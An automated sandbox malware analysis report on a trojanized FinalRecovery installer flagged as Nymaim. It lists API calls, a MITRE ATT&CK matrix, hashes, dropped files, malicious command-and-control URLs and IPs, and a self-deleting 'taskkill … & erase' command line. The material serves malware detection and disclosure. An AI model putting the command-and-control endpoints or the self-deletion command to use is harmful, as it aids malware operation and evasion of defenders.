Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_00476C24 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_0042DF9C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: GetLocaleInfoA,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_0040F773 cpuid

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_00457964 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004026C4 GetSystemTime,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405CBC GetVersionExA,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_004547B8 GetUserNameA,

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	23 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Process Injection	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	2%	ReversingLabs
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe	60%	ReversingLabs	Win32.Trojan.GenusAgent

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.file.tmp.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.3.file.exe.23675c8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.file.tmp.4b375c.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.file.exe.218b608.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.finalrecovery.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1250671	Download File
1.0.file.tmp.4b375c.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.file.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.innosetup.com/	0%	URL Reputation	safe
http://www.innosetup.com/	0%	URL Reputation	safe
http://45.12.253.72/default/stuk.php	0%	URL Reputation	safe
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte	0%	URL Reputation	safe
http://www.remobjects.com/psU	0%	URL Reputation	safe
http://45.12.253.72/default/puk.php	0%	URL Reputation	safe
http://45.12.253.75/dll.php	0%	URL Reputation	safe
http://www.finalrecovery.com/buy.htm	0%	URL Reputation	safe
http://www.remobjects.com/ps	0%	URL Reputation	safe
http://nbafrog.com/b	0%	Avira URL Cloud	safe
http://45.12.253.75/dll.phpI	0%	Avira URL Cloud	safe
http://45.12.253.72/default/stuk.phpE	0%	Avira URL Cloud	safe
http://nbafrog.com/.	0%	Avira URL Cloud	safe
http://45.12.253.72/default/puk.phpk	0%	Avira URL Cloud	safe
http://nbafrog.com/	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://45.12.253.72/default/stuk.php	true	URL Reputation: safe	unknown
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte	true	URL Reputation: safe	unknown
http://45.12.253.72/default/puk.php	true	URL Reputation: safe	unknown
http://45.12.253.75/dll.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.remobjects.com/psU	file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	false	URL Reputation: safe	unknown
http://45.12.253.75/dll.phpI	finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.12.253.72/default/puk.phpk	finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nbafrog.com/b	file.tmp, 00000001.00000003.324143463.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324394304.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.finalrecovery.com/buy.htm	is-587OJ.tmp.1.dr	false	URL Reputation: safe	unknown
http://45.12.253.72/default/stuk.phpE	finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.remobjects.com/ps	file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	false	URL Reputation: safe	unknown
http://nbafrog.com/	file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nbafrog.com/.	file.exe, 00000000.00000003.324832803.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242527892.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324490677.0000000002267000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.12.253.72	unknown	Germany	33657	CMCSUS	true
45.12.253.75	unknown	Germany	33657	CMCSUS	true
45.12.253.98	unknown	Germany	33657	CMCSUS	true
45.12.253.56	unknown	Germany	33657	CMCSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791301
Start date and time:	2023-01-25 10:01:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@12/24@0/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 38.5% (good quality ratio 37.4%) Quality average: 81.2% Quality standard deviation: 24.8%
HCA Information:	Successful, ratio: 97% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:02:03	API Interceptor	1x Sleep call for process: 6tohc1clzbcir.exe modified

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	791040
Entropy (8bit):	6.608982798504157
Encrypted:	false
SSDEEP:	24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
MD5:	5C2FE7D4DDE65810152054F3C93C1815
SHA1:	2A19F3FAA78A5072068F7902DB19A248F11FA69B
SHA-256:	233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
SHA-512:	2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................\|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......\|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Readme.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1949
Entropy (8bit):	4.915453283427292
Encrypted:	false
SSDEEP:	48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
MD5:	C0AE85DB30FE9027DBBF3BA758FA78BE
SHA1:	95E69DB95504A9F61D090690F32FB5D2F685C604
SHA-256:	CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
SHA-512:	DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\Config.xml (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
Category:	dropped
Size (bytes):	6452
Entropy (8bit):	4.734154041089812
Encrypted:	false
SSDEEP:	96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
MD5:	247D3A0C3B0C53CA33D032A561619495
SHA1:	F30570C48749FE427FACCBDF925048B149D22460
SHA-256:	783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
SHA-512:	9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\is-K2TAS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
Category:	dropped
Size (bytes):	6452
Entropy (8bit):	4.734154041089812
Encrypted:	false
SSDEEP:	96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
MD5:	247D3A0C3B0C53CA33D032A561619495
SHA1:	F30570C48749FE427FACCBDF925048B149D22460
SHA-256:	783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
SHA-512:	9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.chm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	553405
Entropy (8bit):	7.979175020825392
Encrypted:	false
SSDEEP:	12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
MD5:	37E6EEA8C4E469F6439F3790166815DD
SHA1:	E0A3768F291CC7FCE178A001F0356D4FBA29D81F
SHA-256:	606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
SHA-512:	68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
Malicious:	false
Preview:	ITSF....`.......&..u.......\|.{.......".....\|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	1327103
Entropy (8bit):	6.349641677377942
Encrypted:	false
SSDEEP:	24576:p8sn21M2uJJKYcbmuBm/GAihHJTo+M/FLUTTb2ghAfrZLya6p4ZyQzAp:CsroY6mGAugUlgIbn
MD5:	88A9155EB9D85157634ED38D128C877B
SHA1:	1ED44B28A6652EC52EE93DE9DD18065625938D0B
SHA-256:	919DBDEDBDF4312EF0EF97A94343DEC76EEBA35FD50CE0A8B3885029750FAD06
SHA-512:	4A04B85C7DF8ECCDCF7740EB5B451B0696D3C109308766D4A1BB7288B7A13891AC6023EF81BB1754A97157DDC265AF40660AAB6C0E468FC5A4366A92BFD54E71
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-05LH6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	553405
Entropy (8bit):	7.979175020825392
Encrypted:	false
SSDEEP:	12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
MD5:	37E6EEA8C4E469F6439F3790166815DD
SHA1:	E0A3768F291CC7FCE178A001F0356D4FBA29D81F
SHA-256:	606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
SHA-512:	68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
Malicious:	false
Preview:	ITSF....`.......&..u.......\|.{.......".....\|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-587OJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1949
Entropy (8bit):	4.915453283427292
Encrypted:	false
SSDEEP:	48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
MD5:	C0AE85DB30FE9027DBBF3BA758FA78BE
SHA1:	95E69DB95504A9F61D090690F32FB5D2F685C604
SHA-256:	CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
SHA-512:	DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
Malicious:	false
Preview:	.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-8DPO5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	1327103
Entropy (8bit):	6.349642071497365
Encrypted:	false
